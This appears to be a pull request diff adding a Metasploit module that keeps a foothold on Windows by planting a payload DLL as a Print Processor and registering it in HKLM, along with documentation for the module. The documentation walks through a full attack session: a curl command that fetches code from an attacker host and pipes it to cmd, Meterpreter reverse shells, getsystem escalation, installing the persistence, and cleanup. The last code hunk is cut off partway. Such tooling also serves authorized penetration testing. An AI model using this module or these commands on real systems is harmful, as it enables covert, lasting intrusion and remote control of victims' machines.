### PR TITLE
Add Windows Print Processor persistence module

### DIFF
--- a/documentation/modules/exploit/windows/persistence/print_processor.md
+++ b/documentation/modules/exploit/windows/persistence/print_processor.md
@@ -22,7 +22,7 @@ Verified on Windows 11 25H2.
 
 ### RESTART_SPOOLER
 
-Whether to restart the Print Spooler service after installing persistence to trigger the payload immediately without waiting for a reboot. Default is `true`.
+Whether to restart the Print Spooler service after installing persistence to trigger the payload immediately without waiting for a reboot. Default is `false`.
 
 ### PAYLOAD_NAME
 

--- a/documentation/modules/exploit/windows/persistence/print_processor.md
+++ b/documentation/modules/exploit/windows/persistence/print_processor.md
@@ -1,0 +1,116 @@
+## Vulnerable Application
+
+This module establishes persistence by registering a malicious Print Processor DLL
+under `HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\<arch>\Print Processors`.
+The Print Spooler service loads configured processor DLLs at startup, causing payload execution when the spooler service starts.
+
+SYSTEM privileges are required to write to the print processor directory and modify HKLM.
+
+Verified on Windows 11 25H2.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Get a SYSTEM meterpreter session
+3. `use exploit/windows/persistence/print_processor`
+4. `set SESSION [SESSION]`
+5. `run`
+6. Reboot the target machine
+7. You should get a new meterpreter session
+
+## Options
+
+### RESTART_SPOOLER
+
+Whether to restart the Print Spooler service after installing persistence to trigger the payload immediately without waiting for a reboot. Default is `true`.
+
+### PAYLOAD_NAME
+
+Name of the DLL file to write to the print processor directory. Defaults to a random 8 character string.
+
+### PROCESSOR_NAME
+
+Name of the registry key to create under the Print Processors key. Defaults to a random 8 character string.
+
+## Scenarios
+
+### Windows 11 25H2 (64 bit) 
+
+Get a meterpreter session
+
+```
+msf > setg verbose true
+verbose => true
+msf > set lhost 1.1.1.1
+lhost => 1.1.1.1
+msf > use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > set fetch_command CURL
+fetch_command => CURL
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > set fetch_pipe true
+fetch_pipe => true
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > to_handler 
+[*] Command served: curl -so %TEMP%\jjWIVwKdnwT.exe http://1.1.1.1:8080/nCaX6BQrNbeVWy71mJdg9w & start /B %TEMP%\jjWIVwKdnwT.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/tIBmwp8Cy7-zPaVZhD-bvw|cmd
+[*] Payload Handler Started as Job 0
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /nCaX6BQrNbeVWy71mJdg9w
+[*] Adding resource /tIBmwp8Cy7-zPaVZhD-bvw
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Client 2.2.2.2 requested /tIBmwp8Cy7-zPaVZhD-bvw
+[*] Sending payload to 2.2.2.2 (curl/8.19.0)
+[*] Client 2.2.2.2 requested /nCaX6BQrNbeVWy71mJdg9w
+[*] Sending payload to 2.2.2.2 (curl/8.19.0)
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:58002) at 2026-05-26 10:50:16 +0200
+```
+
+Elevate session to SYSTEM
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid 
+Server username: TESTWIN\user
+meterpreter > getsystem 
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
+
+Install Persistence
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/print_processor
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/print_processor) > set session 1
+session => 1
+msf exploit(windows/persistence/print_processor) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/print_processor) > set lport 4445
+lport => 4445
+msf exploit(windows/persistence/print_processor) > run
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/print_processor) > 
+[*] Started reverse TCP handler on 1.1.1.1:4445 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target appears vulnerable to Print Processor persistence
+[*] Writing payload to C:\Windows\System32\spool\prtprocs\x64\clRgCgeI.dll
+[+] Payload DLL written to C:\Windows\System32\spool\prtprocs\x64\clRgCgeI.dll
+[+] Registry key written
+[*] Attempting to restart Spooler service for immediate payload trigger...
+[+] Spooler service restarted successfully
+[*] Meterpreter-compatible Cleanup RC file: /home/user/.msf4/logs/persistence/TESTWIN_20260526.5113/TESTWIN_20260526.5113.rc
+```
+
+Show the persistence by rebooting the machine
+
+```
+msf exploit(windows/persistence/print_processor) > [*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+
+[*] Sending stage (248902 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4445 -> 2.2.2.2:55145) at 2026-05-26 10:53:15 +0200
+```

--- a/documentation/modules/exploit/windows/persistence/print_processor.md
+++ b/documentation/modules/exploit/windows/persistence/print_processor.md
@@ -4,9 +4,9 @@ This module establishes persistence by registering a malicious Print Processor D
 under `HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\<arch>\Print Processors`.
 The Print Spooler service loads configured processor DLLs at startup, causing payload execution when the spooler service starts.
 
-SYSTEM privileges are required to write to the print processor directory and modify HKLM.
+Administrator or SYSTEM privileges are required to write to the print processor directory and modify HKLM.
 
-Verified on Windows 11 25H2.
+Verified on Windows 11 24H2+ (10.0 Build 26200).
 
 ## Verification Steps
 
@@ -34,7 +34,7 @@ Name of the registry key to create under the Print Processors key. Defaults to a
 
 ## Scenarios
 
-### Windows 11 25H2 (64 bit) 
+### Windows 11 24H2+ (10.0 Build 26200)
 
 Get a meterpreter session
 
@@ -49,7 +49,7 @@ fetch_command => CURL
 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > set fetch_pipe true
 fetch_pipe => true
 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > to_handler 
-[*] Command served: curl -so %TEMP%\jjWIVwKdnwT.exe http://1.1.1.1:8080/nCaX6BQrNbeVWy71mJdg9w & start /B %TEMP%\jjWIVwKdnwT.exe
+[*] Command served: curl -so %TEMP%\RrPtyhMi.exe http://1.1.1.1:8080/nCaX6BQrNbeVWy71mJdg9w & start /B %TEMP%\RrPtyhMi.exe
 
 [*] Command to run on remote host: curl -s http://1.1.1.1:8080/tIBmwp8Cy7-zPaVZhD-bvw|cmd
 [*] Payload Handler Started as Job 0
@@ -63,21 +63,21 @@ msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
 [*] Sending payload to 2.2.2.2 (curl/8.19.0)
 [*] Client 2.2.2.2 requested /nCaX6BQrNbeVWy71mJdg9w
 [*] Sending payload to 2.2.2.2 (curl/8.19.0)
-[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:58002) at 2026-05-26 10:50:16 +0200
-```
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:54150) at 2026-06-02 17:27:27 +0200
 
-Elevate session to SYSTEM
-
-```
 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
 [*] Starting interaction with 1...
 
-meterpreter > getuid 
-Server username: TESTWIN\user
-meterpreter > getsystem 
-...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > sysinfo
+Computer        : TESTWIN
+OS              : Windows 11 24H2+ (10.0 Build 26200).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
 meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
+Server username: TESTWIN\user
 ```
 
 Install Persistence
@@ -98,12 +98,10 @@ msf exploit(windows/persistence/print_processor) >
 [*] Started reverse TCP handler on 1.1.1.1:4445 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Target appears vulnerable to Print Processor persistence
-[*] Writing payload to C:\Windows\System32\spool\prtprocs\x64\clRgCgeI.dll
-[+] Payload DLL written to C:\Windows\System32\spool\prtprocs\x64\clRgCgeI.dll
+[*] Writing payload to C:\Windows\System32\spool\prtprocs\x64\eYBtxARb.dll
+[+] Payload DLL written to C:\Windows\System32\spool\prtprocs\x64\eYBtxARb.dll
 [+] Registry key written
-[*] Attempting to restart Spooler service for immediate payload trigger...
-[+] Spooler service restarted successfully
-[*] Meterpreter-compatible Cleanup RC file: /home/user/.msf4/logs/persistence/TESTWIN_20260526.5113/TESTWIN_20260526.5113.rc
+[*] Meterpreter-compatible Cleanup RC file: /home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc
 ```
 
 Show the persistence by rebooting the machine
@@ -112,5 +110,32 @@ Show the persistence by rebooting the machine
 msf exploit(windows/persistence/print_processor) > [*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
 
 [*] Sending stage (248902 bytes) to 2.2.2.2
-[*] Meterpreter session 2 opened (1.1.1.1:4445 -> 2.2.2.2:55145) at 2026-05-26 10:53:15 +0200
+[*] Meterpreter session 2 opened (1.1.1.1:4445 -> 2.2.2.2:49674) at 2026-06-02 17:32:58 +0200
+```
+
+Cleanup
+
+```
+msf exploit(windows/persistence/print_processor) > sessions 2
+[*] Starting interaction with 2...
+
+meterpreter > resource /home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc
+[*] Processing /home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc for ERB directives.
+resource (/home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc)> execute -f cmd.exe -a '/c net stop spooler' -i -H
+Process 6624 created.
+Channel 1 created.
+The Print Spooler service is stopping.
+The Print Spooler service was stopped successfully.
+
+resource (/home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc)> execute -f cmd.exe -a '/c taskkill /F /IM spoolsv.exe' -i -H
+Process 4376 created.
+Channel 2 created.
+SUCCESS: The process "spoolsv.exe" with PID 2844 has been terminated.
+resource (/home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc)> execute -f cmd.exe -a '/c del "C:\Windows\System32\spool\prtprocs\x64\eYBtxARb.dll"' -i -H
+Process 6048 created.
+Channel 3 created.
+resource (/home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc)> reg deletekey -k 'HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\mdnGFlPw'
+Successfully deleted key: HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\mdnGFlPw
+resource (/home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc)> execute -f cmd.exe -a '/c net start spooler' -H
+Process 6080 created.
 ```

--- a/documentation/modules/exploit/windows/persistence/print_processor.md
+++ b/documentation/modules/exploit/windows/persistence/print_processor.md
@@ -49,7 +49,7 @@ fetch_command => CURL
 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > set fetch_pipe true
 fetch_pipe => true
 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > to_handler 
-[*] Command served: curl -so %TEMP%\RrPtyhMi.exe http://1.1.1.1:8080/nCaX6BQrNbeVWy71mJdg9w & start /B %TEMP%\RrPtyhMi.exe
+[*] Command served: curl -so %TEMP%\kAcFKfQdt.exe http://1.1.1.1:8080/nCaX6BQrNbeVWy71mJdg9w & start /B %TEMP%\kAcFKfQdt.exe
 
 [*] Command to run on remote host: curl -s http://1.1.1.1:8080/tIBmwp8Cy7-zPaVZhD-bvw|cmd
 [*] Payload Handler Started as Job 0
@@ -60,16 +60,16 @@ msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
 [*] Adding resource /tIBmwp8Cy7-zPaVZhD-bvw
 [*] Started reverse TCP handler on 1.1.1.1:4444 
 [*] Client 2.2.2.2 requested /tIBmwp8Cy7-zPaVZhD-bvw
-[*] Sending payload to 2.2.2.2 (curl/8.19.0)
+[*] Sending payload to 2.2.2.2 (curl/8.21.0)
 [*] Client 2.2.2.2 requested /nCaX6BQrNbeVWy71mJdg9w
-[*] Sending payload to 2.2.2.2 (curl/8.19.0)
-[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:54150) at 2026-06-02 17:27:27 +0200
+[*] Sending payload to 2.2.2.2 (curl/8.21.0)
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:64275) at 2026-08-29 01:28:21 +0200
 
 msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
 [*] Starting interaction with 1...
 
 meterpreter > sysinfo
-Computer        : TESTWIN
+Computer        : WIN11-TEST
 OS              : Windows 11 24H2+ (10.0 Build 26200).
 Architecture    : x64
 System Language : en_US
@@ -77,7 +77,7 @@ Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x64/windows
 meterpreter > getuid
-Server username: TESTWIN\user
+Server username: WIN11-TEST\user
 ```
 
 Install Persistence
@@ -91,6 +91,8 @@ msf exploit(windows/persistence/print_processor) > set payload windows/x64/meter
 payload => windows/x64/meterpreter/reverse_tcp
 msf exploit(windows/persistence/print_processor) > set lport 4445
 lport => 4445
+msf exploit(windows/persistence/print_processor) > set restart_spooler true
+restart_spooler => true
 msf exploit(windows/persistence/print_processor) > run
 [*] Exploit running as background job 1.
 [*] Exploit completed, but no session was created.
@@ -98,44 +100,53 @@ msf exploit(windows/persistence/print_processor) >
 [*] Started reverse TCP handler on 1.1.1.1:4445 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Target appears vulnerable to Print Processor persistence
-[*] Writing payload to C:\Windows\System32\spool\prtprocs\x64\eYBtxARb.dll
-[+] Payload DLL written to C:\Windows\System32\spool\prtprocs\x64\eYBtxARb.dll
+[*] Writing payload to C:\Windows\System32\spool\prtprocs\x64\ojaEIaiT.dll
+[+] Payload DLL written to C:\Windows\System32\spool\prtprocs\x64\ojaEIaiT.dll
 [+] Registry key written
-[*] Meterpreter-compatible Cleanup RC file: /home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc
+[*] Attempting to restart Spooler service for immediate payload trigger...
+[*] [Spooler] Service already running attempting to stop and restart
+[+] [Spooler] Service started
+[+] Spooler service restarted successfully
+[*] Executing Add-Printer command...
+[*] Meterpreter-compatible Cleanup RC file: /home/user/.msf4/logs/persistence/WIN11-TEST_20260829.3442/WIN11-TEST_20260829.3442.rc
+[*] Sending stage (248902 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4445 -> 2.2.2.2:64334) at 2026-08-29 01:34:46 +0200
 ```
 
 Show the persistence by rebooting the machine
 
 ```
-msf exploit(windows/persistence/print_processor) > [*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
-
+[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+[*] 2.2.2.2 - Meterpreter session 2 closed.  Reason: Died
 [*] Sending stage (248902 bytes) to 2.2.2.2
-[*] Meterpreter session 2 opened (1.1.1.1:4445 -> 2.2.2.2:49674) at 2026-06-02 17:32:58 +0200
+[*] Meterpreter session 3 opened (1.1.1.1:4445 -> 2.2.2.2:60505) at 2026-08-29 01:42:05 +0200
 ```
 
 Cleanup
 
 ```
-msf exploit(windows/persistence/print_processor) > sessions 2
-[*] Starting interaction with 2...
+msf exploit(windows/persistence/print_processor) > sessions -i 3
+[*] Starting interaction with 3...
 
-meterpreter > resource /home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc
-[*] Processing /home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc for ERB directives.
-resource (/home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc)> execute -f cmd.exe -a '/c net stop spooler' -i -H
-Process 6624 created.
+meterpreter > resource /home/user/.msf4/logs/persistence/WIN11-TEST_20260829.3442/WIN11-TEST_20260829.3442.rc
+[*] Processing /home/user/.msf4/logs/persistence/WIN11-TEST_20260829.3442/WIN11-TEST_20260829.3442.rc for ERB directives.
+resource (/home/user/.msf4/logs/persistence/WIN11-TEST_20260829.3442/WIN11-TEST_20260829.3442.rc)> execute -f cmd.exe -a '/c wmic printer where name="wQyJCXkC" delete' -H
+Process 5616 created.
+resource (/home/user/.msf4/logs/persistence/WIN11-TEST_20260829.3442/WIN11-TEST_20260829.3442.rc)> execute -f cmd.exe -a '/c net stop spooler' -i -H
+Process 5304 created.
 Channel 1 created.
 The Print Spooler service is stopping.
 The Print Spooler service was stopped successfully.
 
-resource (/home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc)> execute -f cmd.exe -a '/c taskkill /F /IM spoolsv.exe' -i -H
-Process 4376 created.
+resource (/home/user/.msf4/logs/persistence/WIN11-TEST_20260829.3442/WIN11-TEST_20260829.3442.rc)> execute -f cmd.exe -a '/c taskkill /F /IM spoolsv.exe' -i -H
+Process 5336 created.
 Channel 2 created.
-SUCCESS: The process "spoolsv.exe" with PID 2844 has been terminated.
-resource (/home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc)> execute -f cmd.exe -a '/c del "C:\Windows\System32\spool\prtprocs\x64\eYBtxARb.dll"' -i -H
-Process 6048 created.
+SUCCESS: The process "spoolsv.exe" with PID 2404 has been terminated.
+resource (/home/user/.msf4/logs/persistence/WIN11-TEST_20260829.3442/WIN11-TEST_20260829.3442.rc)> execute -f cmd.exe -a '/c del "C:\Windows\System32\spool\prtprocs\x64\ojaEIaiT.dll"' -i -H
+Process 5568 created.
 Channel 3 created.
-resource (/home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc)> reg deletekey -k 'HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\mdnGFlPw'
-Successfully deleted key: HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\mdnGFlPw
-resource (/home/user/.msf4/logs/persistence/TESTWIN_20260602.3134/TESTWIN_20260602.3134.rc)> execute -f cmd.exe -a '/c net start spooler' -H
-Process 6080 created.
+resource (/home/user/.msf4/logs/persistence/WIN11-TEST_20260829.3442/WIN11-TEST_20260829.3442.rc)> reg deletekey -k 'HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\kEoWGFoN'
+Successfully deleted key: HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\kEoWGFoN
+resource (/home/user/.msf4/logs/persistence/WIN11-TEST_20260829.3442/WIN11-TEST_20260829.3442.rc)> execute -f cmd.exe -a '/c net start spooler' -H
+Process 8972 created.
 ```

--- a/documentation/modules/exploit/windows/persistence/print_processor.md
+++ b/documentation/modules/exploit/windows/persistence/print_processor.md
@@ -22,7 +22,8 @@ Verified on Windows 11 24H2+ (10.0 Build 26200).
 
 ### RESTART_SPOOLER
 
-Whether to restart the Print Spooler service after installing persistence to trigger the payload immediately without waiting for a reboot. Default is `false`.
+Whether to restart the Print Spooler service after installing persistence to trigger the payload immediately without waiting for a reboot.
+Default is `false`.
 
 ### PAYLOAD_NAME
 

--- a/modules/exploits/windows/persistence/print_processor.rb
+++ b/modules/exploits/windows/persistence/print_processor.rb
@@ -64,16 +64,16 @@ class MetasploitModule < Msf::Exploit::Local
 
   def target_dir
     base = 'C:\\Windows\\System32\\spool\\prtprocs'
-    sysinfo['Architecture'] =~ /64/ ? "#{base}\\x64" : "#{base}\\w32x86"
+    sysinfo['Architecture'] == ARCH_X64 ? "#{base}\\x64" : "#{base}\\w32x86"
   end
 
   def env_key
-    sysinfo['Architecture'] =~ /64/ ? 'Windows x64' : 'Windows NT x86'
+    sysinfo['Architecture'] == ARCH_X64 ? 'Windows x64' : 'Windows NT x86'
   end
 
   def check
-    return CheckCode::Safe('SYSTEM privileges are required') unless is_system?
-    return CheckCode::Safe("Target directory #{target_dir} does not exist") unless directory?(target_dir)
+    return CheckCode::Unknown('SYSTEM privileges are required') unless is_system?
+    return CheckCode::Unknown("Target directory #{target_dir} does not exist") unless directory?(target_dir)
 
     spooler = service_info('Spooler')
     return CheckCode::Safe('Spooler service not found') if spooler.nil?

--- a/modules/exploits/windows/persistence/print_processor.rb
+++ b/modules/exploits/windows/persistence/print_processor.rb
@@ -1,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::Services
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Local::Persistence
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Print Processor Persistence',
+        'Description' => %q{
+          This module establishes persistence by registering a malicious Print Processor DLL
+          under HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\<arch>\Print Processors.
+          The Print Spooler service loads configured processor DLLs at startup, causing payload
+          execution when the spooler service starts (for example, on boot).
+
+          This module implements the manual registry method (not the AddMonitor API method).
+          It writes the payload DLL to the print processor directory and requires SYSTEM
+          privileges to write to that directory and modify HKLM. The spooler service is briefly
+          stopped and restarted to activate the registered processor.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Emanuele Cervelli',
+        ],
+        'Platform' => [ 'win' ],
+        'Arch' => [ARCH_X64, ARCH_X86],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1547_012_PRINT_PROCESSORS],
+          ['URL', 'https://hadess.io/the-art-of-windows-persistence/']
+        ],
+        'DefaultTarget' => 0,
+        # Date the technique was published on MITRE ATT&CK (T1547.012)
+        'DisclosureDate' => '2020-10-05',
+        'Notes' => {
+          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('PAYLOAD_NAME', [true, 'Name of payload file to write. Random string as default.', Rex::Text.rand_text_alpha(8) + '.dll']),
+      OptString.new('PROCESSOR_NAME', [true, 'Name of the print processor registry key to create. Random string by default.', Rex::Text.rand_text_alpha(8)]),
+      OptBool.new('RESTART_SPOOLER', [true, 'Restart the Print Spooler service to trigger processor loading immediately.', true])
+    ])
+  end
+
+  def target_dir
+    base = 'C:\\Windows\\System32\\spool\\prtprocs'
+    sysinfo['Architecture'] =~ /64/ ? "#{base}\\x64" : "#{base}\\w32x86"
+  end
+
+  def env_key
+    sysinfo['Architecture'] =~ /64/ ? 'Windows x64' : 'Windows NT x86'
+  end
+
+  def check
+    return CheckCode::Safe('SYSTEM privileges are required') unless is_system?
+    return CheckCode::Safe("Target directory #{target_dir} does not exist") unless directory?(target_dir)
+
+    spooler = service_info('Spooler')
+    return CheckCode::Safe('Spooler service not found') if spooler.nil?
+
+    CheckCode::Appears('Target appears vulnerable to Print Processor persistence')
+  end
+
+  def install_persistence
+    fail_with(Failure::NoAccess, 'SYSTEM privileges are required') unless is_system?
+
+    payload_name = datastore['PAYLOAD_NAME']
+    payload_name += '.dll' unless payload_name.downcase.end_with?('.dll')
+    payload_dll = generate_payload_dll
+    payload_pathname = "#{target_dir}\\#{payload_name}"
+
+    vprint_status("Writing payload to #{payload_pathname}")
+    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_dll)
+    print_good("Payload DLL written to #{payload_pathname}")
+
+    processor_name = datastore['PROCESSOR_NAME'] || Rex::Text.rand_text_alpha(8)
+    reg_key = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\#{env_key}\\Print Processors\\#{processor_name}"
+
+    unless registry_createkey(reg_key)
+      rm_f(payload_pathname)
+      fail_with(Failure::UnexpectedReply, "Failed to create registry key: #{reg_key}")
+    end
+
+    unless registry_setvaldata(reg_key, 'Driver', payload_name, 'REG_SZ')
+      registry_deletekey(reg_key)
+      rm_f(payload_pathname)
+      fail_with(Failure::UnexpectedReply, "Failed to write registry value: #{reg_key}\\Driver")
+    end
+
+    print_good('Registry key written')
+
+    restart_spooler if datastore['RESTART_SPOOLER']
+
+    @clean_up_rc << "execute -f cmd.exe -a '/c net stop spooler && taskkill /F /IM spoolsv.exe && del \"#{payload_pathname}\"' -i -H\n"
+    @clean_up_rc << "reg deletekey -k '#{reg_key}'\n"
+    @clean_up_rc << "execute -f cmd.exe -a '/c net start spooler' -H\n"
+  end
+
+  def restart_spooler
+    print_status('Attempting to restart Spooler service for immediate payload trigger...')
+    stop_result = service_stop('Spooler')
+    start_result = service_start('Spooler')
+
+    # TODO: Remove this
+    vprint_status("service_stop returned: #{stop_result.inspect}")
+    vprint_status("service_start returned: #{start_result.inspect}")
+    if stop_result.zero? && start_result.zero?
+      print_good('Spooler service restarted successfully')
+    else
+      print_warning("Unable to restart Spooler cleanly (stop=#{stop_result}, start=#{start_result}).")
+    end
+  rescue Rex::Post::Meterpreter::RequestError, NoMethodError => e
+    print_warning("Failed to restart Spooler service automatically: #{e.class} #{e}")
+  end
+end

--- a/modules/exploits/windows/persistence/print_processor.rb
+++ b/modules/exploits/windows/persistence/print_processor.rb
@@ -56,9 +56,9 @@ class MetasploitModule < Msf::Exploit::Local
     )
 
     register_options([
-      OptString.new('PAYLOAD_NAME', [true, 'Name of payload file to write. Random string as default.', Rex::Text.rand_text_alpha(8) + '.dll']),
-      OptString.new('PROCESSOR_NAME', [true, 'Name of the print processor registry key to create. Random string by default.', Rex::Text.rand_text_alpha(8)]),
-      OptBool.new('RESTART_SPOOLER', [true, 'Restart the Print Spooler service to trigger processor loading immediately.', true])
+      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
+      OptString.new('PROCESSOR_NAME', [false, 'Name of the print processor registry key to create. Random string by default.']),
+      OptBool.new('RESTART_SPOOLER', [true, 'Restart the Print Spooler service to trigger processor loading immediately.', false])
     ])
   end
 
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Local
   def install_persistence
     fail_with(Failure::NoAccess, 'SYSTEM privileges are required') unless is_system?
 
-    payload_name = datastore['PAYLOAD_NAME']
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8)
     payload_name += '.dll' unless payload_name.downcase.end_with?('.dll')
     payload_dll = generate_payload_dll
     payload_pathname = "#{target_dir}\\#{payload_name}"
@@ -111,7 +111,9 @@ class MetasploitModule < Msf::Exploit::Local
 
     restart_spooler if datastore['RESTART_SPOOLER']
 
-    @clean_up_rc << "execute -f cmd.exe -a '/c net stop spooler && taskkill /F /IM spoolsv.exe && del \"#{payload_pathname}\"' -i -H\n"
+    @clean_up_rc << "execute -f cmd.exe -a '/c net stop spooler' -i -H\n"
+    @clean_up_rc << "execute -f cmd.exe -a '/c taskkill /F /IM spoolsv.exe' -i -H\n"
+    @clean_up_rc << "execute -f cmd.exe -a '/c del \"#{payload_pathname}\"' -i -H\n"
     @clean_up_rc << "reg deletekey -k '#{reg_key}'\n"
     @clean_up_rc << "execute -f cmd.exe -a '/c net start spooler' -H\n"
   end
@@ -121,9 +123,6 @@ class MetasploitModule < Msf::Exploit::Local
     stop_result = service_stop('Spooler')
     start_result = service_start('Spooler')
 
-    # TODO: Remove this
-    vprint_status("service_stop returned: #{stop_result.inspect}")
-    vprint_status("service_start returned: #{start_result.inspect}")
     if stop_result.zero? && start_result.zero?
       print_good('Spooler service restarted successfully')
     else

--- a/modules/exploits/windows/persistence/print_processor.rb
+++ b/modules/exploits/windows/persistence/print_processor.rb
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Local
           execution when the spooler service starts (for example, on boot).
 
           This module implements the manual registry method (not the AddMonitor API method).
-          It writes the payload DLL to the print processor directory and requires SYSTEM
+          It writes the payload DLL to the print processor directory and requires SYSTEM or admin
           privileges to write to that directory and modify HKLM. The spooler service is briefly
           stopped and restarted to activate the registered processor.
         },
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    return CheckCode::Unknown('SYSTEM privileges are required') unless is_system?
+    return CheckCode::Unknown('Admin or SYSTEM privileges are required') unless is_system? || is_admin?
     return CheckCode::Unknown("Target directory #{target_dir} does not exist") unless directory?(target_dir)
 
     spooler = service_info('Spooler')
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def install_persistence
-    fail_with(Failure::NoAccess, 'SYSTEM privileges are required') unless is_system?
+    fail_with(Failure::NoAccess, 'Admin or SYSTEM privileges are required') unless is_system? || is_admin?
 
     payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8)
     payload_name += '.dll' unless payload_name.downcase.end_with?('.dll')
@@ -109,26 +109,19 @@ class MetasploitModule < Msf::Exploit::Local
 
     print_good('Registry key written')
 
-    restart_spooler if datastore['RESTART_SPOOLER']
+    if datastore['RESTART_SPOOLER']
+      vprint_status('Attempting to restart Spooler service for immediate payload trigger...')
